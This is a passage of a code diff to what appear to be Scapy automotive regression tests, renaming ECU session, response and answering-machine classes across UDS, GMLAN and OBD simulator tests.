ECUSession in sniff. An ISOTPSocket or any +* This example shows the usage of a EcuSession in sniff. An ISOTPSocket or any * socket like object which returns entire messages of the right protocol can be used. -* A ``ECUSession`` is used as supersession in an ``ISOTPSession``. To obtain the ``ECU`` object from a ``ECUSession``, -* the ``ECUSession`` has to be created outside of sniff. +* A ``EcuSession`` is used as supersession in an ``ISOTPSession``. To obtain the ``Ecu`` object from a ``EcuSession``, +* the ``EcuSession`` has to be created outside of sniff. -session = ECUSession() +session = EcuSession() with PcapReader("test/contrib/automotive/ecu_trace.pcap.gz") as sock: udsmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock) @@ -182,9 +182,9 @@ assert response.responses[0].dataIdentifier == 61786 # no_docs assert len(ecu.log["TransferData"]) == 2 # no_docs -= Analyze on the fly with ECUSession GMLAN1 += Analyze on the fly with EcuSession GMLAN1 -session = ECUSession() +session = EcuSession() with CandumpReader("test/contrib/automotive/gmlan_trace.candump") as sock: gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=2, opened_socket=sock) @@ -212,9 +212,9 @@ with CandumpReader("test/contrib/automotive/gmlan_trace.candump") as sock: assert ecu.current_session == 2 assert ecu.current_security_level == 2 -= Analyze on the fly with ECUSession GMLAN logging test += Analyze on the fly with EcuSession GMLAN logging test -session = ECUSession(verbose=False, store_supported_responses=False) +session = EcuSession(verbose=False, store_supported_responses=False) with CandumpReader("test/contrib/automotive/gmlan_trace.candump") as sock: gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=200, opened_socket=sock) diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index 97246823641..ca2b085ba93 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -1,4 +1,4 @@ -% Regression tests for ECU_am +% Regression tests for EcuAnsweringMachine ~ needs_root + Configuration @@ -133,7 +133,7 @@ load_contrib("automotive.uds", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) print("Set delay to lower utilization") -conf.contribs['ECU_am']['send_delay'] = 0.004 +conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 + Simulator tests @@ -141,13 +141,13 @@ conf.contribs['ECU_am']['send_delay'] = 0.004 drain_bus(iface0) example_responses = \ - [ECUResponse(session=1, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=0x1234) / Raw(b"deadbeef"))] + [EcuResponse(session=1, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=0x1234) / Raw(b"deadbeef"))] success = False with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=UDS, verbose=False) + answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS, verbose=False) sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) sim.start() time.sleep(0.1) @@ -175,16 +175,16 @@ assert success drain_bus(iface0) example_responses = \ - [ECUResponse(session=2, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), - ECUResponse(session=range(3,5), security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), - ECUResponse(session=[5,6,7], security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), - ECUResponse(session=lambda x: 8 < x <= 10, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4"))] + [EcuResponse(session=2, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), + EcuResponse(session=range(3,5), security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), + EcuResponse(session=[5,6,7], security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), + EcuResponse(session=lambda x: 8 < x <= 10, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4"))] success = False with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=UDS) + answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) sim.start() time.sleep(0.1) @@ -225,27 +225,27 @@ assert success drain_bus(iface0) example_responses = \ - [ECUResponse(session=2, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), - ECUResponse(session=range(3,5), security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), - ECUResponse(session=[5,6,7], security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), - ECUResponse(session=lambda x: 8 < x <= 10, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4")), - ECUResponse(session=range(0,8), security_level=lambda x: x==0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=1, sessionParameterRecord=b"dead")), - ECUResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=2, sessionParameterRecord=b"dead")), - ECUResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=3, sessionParameterRecord=b"dead")), - ECUResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=4, sessionParameterRecord=b"dead")), - ECUResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=5, sessionParameterRecord=b"dead")), - ECUResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=6, sessionParameterRecord=b"dead")), - ECUResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=7, sessionParameterRecord=b"dead")), - ECUResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=8, sessionParameterRecord=b"dead")), - ECUResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead1")), - ECUResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead2")), - ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] + [EcuResponse(session=2, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), + EcuResponse(session=range(3,5), security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), + EcuResponse(session=[5,6,7], security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), + EcuResponse(session=lambda x: 8 < x <= 10, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4")), + EcuResponse(session=range(0,8), security_level=lambda x: x==0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=1, sessionParameterRecord=b"dead")), + EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=2, sessionParameterRecord=b"dead")), + EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=3, sessionParameterRecord=b"dead")), + EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=4, sessionParameterRecord=b"dead")), + EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=5, sessionParameterRecord=b"dead")), + EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=6, sessionParameterRecord=b"dead")), + EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=7, sessionParameterRecord=b"dead")), + EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=8, sessionParameterRecord=b"dead")), + EcuResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead1")), + EcuResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead2")), + EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] success = False with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=UDS) + answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) sim.start() time.sleep(0.1) @@ -311,20 +311,20 @@ def custom_answers(resp, req): return False example_responses = \ - [ECUResponse(session=2, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), - ECUResponse(session=range(3,5), security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), - ECUResponse(session=[5,6,7], security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), - ECUResponse(session=lambda x: 8 < x <= 10, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4")), - ECUResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=1, sessionParameterRecord=b"dead"), answers=custom_answers), - ECUResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead1")), - ECUResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead2")), - ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] + [EcuResponse(session=2, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), + EcuResponse(session=range(3,5), security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), + EcuResponse(session=[5,6,7], security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), + EcuResponse(session=lambda x: 8 < x <= 10, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4")), + EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=1, sessionParameterRecord=b"dead"), answers=custom_answers), + EcuResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead1")), + EcuResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead2")), + EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] success = False with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = ECU_am(supported_responses=example_responses, + answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) sim.start() @@ -395,16 +395,16 @@ def custom_answers(resp, req): return False example_responses = \ - [ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234"), answers=custom_answers), - ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), - ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), - ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] + [EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234"), answers=custom_answers), + EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), + EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), + EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] success = False with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = ECU_am(supported_responses=example_responses, + answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) sim = threading.Thread(target=answering_machine, kwargs={'timeout': 10, 'stop_filter': lambda p: p.service==0xff}) sim.start() @@ -447,16 +447,16 @@ def custom_answers(resp, req): return False example_responses = \ - [ECUResponse(session=range(0,255), security_level=0, responses=[UDS()/UDS_NR(negativeResponseCode=0x78, requestServiceId=0x27), UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234")], answers=custom_answers), - ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), - ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), - ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] + [EcuResponse(session=range(0,255), security_level=0, responses=[UDS()/UDS_NR(negativeResponseCode=0x78, requestServiceId=0x27), UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234")], answers=custom_answers), + EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), + EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), + EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] success = False with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = ECU_am(supported_responses=example_responses, + answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) sim = threading.Thread(target=answering_machine, kwargs={'timeout': 10, 'stop_filter': lambda p: p.service==0xff}) sim.start() @@ -499,10 +499,10 @@ def custom_answers(resp, req): return False example_responses = \ - [ECUResponse(session=range(0,255), security_level=0, responses=[UDS()/UDS_NR(negativeResponseCode=0x78, requestServiceId=0x27), UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234")], answers=custom_answers), - ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), - ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), - ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] + [EcuResponse(session=range(0,255), security_level=0, responses=[UDS()/UDS_NR(negativeResponseCode=0x78, requestServiceId=0x27), UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234")], answers=custom_answers), + EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), + EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), + EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] conf.contribs['UDS']['treat-response-pending-as-answer'] = True @@ -510,7 +510,7 @@ success = False with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = ECU_am(supported_responses=example_responses, + answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) sim = threading.Thread(target=answering_machine, kwargs={'timeout':5, 'stop_filter': lambda p: p.service==0xff}) sim.start() diff --git a/test/contrib/automotive/gm/gmlan.uts b/test/contrib/automotive/gm/gmlan.uts index 34710b3a517..748188e049c 100644 --- a/test/contrib/automotive/gm/gmlan.uts +++ b/test/contrib/automotive/gm/gmlan.uts @@ -242,7 +242,7 @@ x.service == 0x67 x.subfunction == 2 x.answers(b) -ecu = ECU() +ecu = Ecu() ecu.update(x) assert ecu.current_security_level == 2 @@ -436,7 +436,7 @@ assert x.answers(y) y.hashret() == x.hashret() = Check modifies ecu state -ecu = ECU() +ecu = Ecu() ecu.update(GMLAN(service="InitiateDiagnosticOperationPositiveResponse")) assert ecu.current_session == 3 ecu.update(GMLAN(service="ReturnToNormalOperationPositiveResponse")) diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 39a02de8320..7ca517c094f 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -542,7 +542,7 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.name = "ECUSimulator" + thread.name +thread.name = "EcuSimulator" + thread.name with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index ae97295663f..75c31dd6c5d 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -136,75 +136,75 @@ load_contrib("automotive.obd.scanner", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) print("Set delay to lower utilization") -conf.contribs['ECU_am']['send_delay'] = 0.004 +conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 = Create answers responses = [ - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=0)/OBD_PID00(supported_pids=3191777299)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=1)/OBD_PID01(mil=0, dtc_count=0, reserved1=0, continuous_tests_ready=0, reserved2=0, continuous_tests_supported=7, once_per_trip_tests_supported=225, once_per_trip_tests_ready=0)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=11)/OBD_PID0B(data=44)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=12)/OBD_PID0C(data=857.0)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=13)/OBD_PID0D(data=0)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=14)/OBD_PID0E(data=3.5)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=15)/OBD_PID0F(data=22.0)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=17)/OBD_PID11(data=14.51)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=19)/OBD_PID13(sensors_present=3)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=21)/OBD_PID15(outputVoltage=1.275, trim=99.219)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=28)/OBD_PID1C(data=6)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=3)/OBD_PID03(fuel_system1=2, fuel_system2=0)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=31)/OBD_PID1F(data=13)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=32)/OBD_PID20(supported_pids=2684465153)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=33)/OBD_PID21(data=0)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=35)/OBD_PID23(data=24910)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=4)/OBD_PID04(data=9.804)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=48)/OBD_PID30(data=19)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=49)/OBD_PID31(data=3587)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=5)/OBD_PID05(data=41.0)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=51)/OBD_PID33(data=97)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=52)/OBD_PID34(equivalence_ratio=1.001, current=128.004)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=6)/OBD_PID06(data=0.0)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=64)/OBD_PID40(supported_pids=244352000)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=69)/OBD_PID45(data=3.922)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=7)/OBD_PID07(data=-0.781)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=70)/OBD_PID46(data=20.0)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=71)/OBD_PID47(data=12.549)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=73)/OBD_PID49(data=5.49)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=76)/OBD_PID4C(data=3.922)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=81)/OBD_PID51(data=1)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=86)/OBD_PID56(bank1=0.0)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=67)/OBD_S03_PR(count=0)), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=0)/OBD_MID00(supported_mids=3221225473)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=131, unit_and_scaling_id=4, test_value=0.0, min_limit=0.0, max_limit=1.0),OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=138, unit_and_scaling_id=132, test_value=0.996, min_limit=-32.768, max_limit=1.06),OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=139, unit_and_scaling_id=132, test_value=0.996, min_limit=0.94, max_limit=32.767)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=128)/OBD_MID80(supported_mids=1)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=160)/OBD_MIDA0(supported_mids=4160749568)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=161)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=162)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=162)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=2, min_limit=0, max_limit=65535)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=163)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=163)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=164)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=164)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=165)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=165)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=145, unit_and_scaling_id=177, test_value=3944, min_limit=900, max_limit=65534),OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=149, unit_and_scaling_id=10, test_value=764.696, min_limit=719.556, max_limit=7995.27),OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=150, unit_and_scaling_id=10, test_value=115.412, min_limit=0.0, max_limit=179.95)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=32)/OBD_MID20(supported_mids=2147485697)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=33)/OBD_MIDXX(standardized_test_id=132, unit_and_scaling_id=3, test_value=2.63, min_limit=1.0, max_limit=655.35)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=128, unit_and_scaling_id=28, test_value=32.42, min_limit=10.0, max_limit=655.35),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=129, unit_and_scaling_id=28, test_value=25.41, min_limit=10.0, max_limit=655.35),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=130, unit_and_scaling_id=28, test_value=0.21, min_limit=0.0, max_limit=10.0),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=131, unit_and_scaling_id=28, test_value=0.0, min_limit=0.0, max_limit=10.0),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=132, unit_and_scaling_id=36, test_value=0, min_limit=0, 